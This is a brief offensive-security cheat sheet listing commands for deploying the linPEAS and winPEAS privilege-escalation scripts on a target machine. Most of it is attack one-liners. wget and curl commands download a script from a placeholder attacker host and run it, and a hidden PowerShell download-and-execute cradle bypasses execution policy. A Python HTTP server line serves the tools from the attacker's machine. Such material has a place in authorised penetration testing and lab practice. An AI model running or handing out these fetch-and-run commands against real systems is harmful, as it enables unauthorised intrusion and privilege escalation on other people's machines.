Privilege Escalation Tools (Linpeas, WinPEAS, etc)

Tools and how to fetch them for local execution.

wget http://<attacker_host>/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh

Download and run linPEAS (Linux privilege escalation script).

curl -fsSL http://<attacker_host>/linpeas.sh -o /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh

Same VIA curl.

powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://<attacker_host>/winPEAS.bat')"

Windows download & run winPEAS (usqe only if you have authorised Windows shell).

chmod +x linpeas.sh

Change the permissions linpeas.sh before usage.

./linpeas.sh

The above command will run linpeas inside your current shell.

python3 -m http.server 8080

The above command runs a http server so you can send linpeas or winPEAS from your machine (the attacker machine) to the target machine (the shell machine).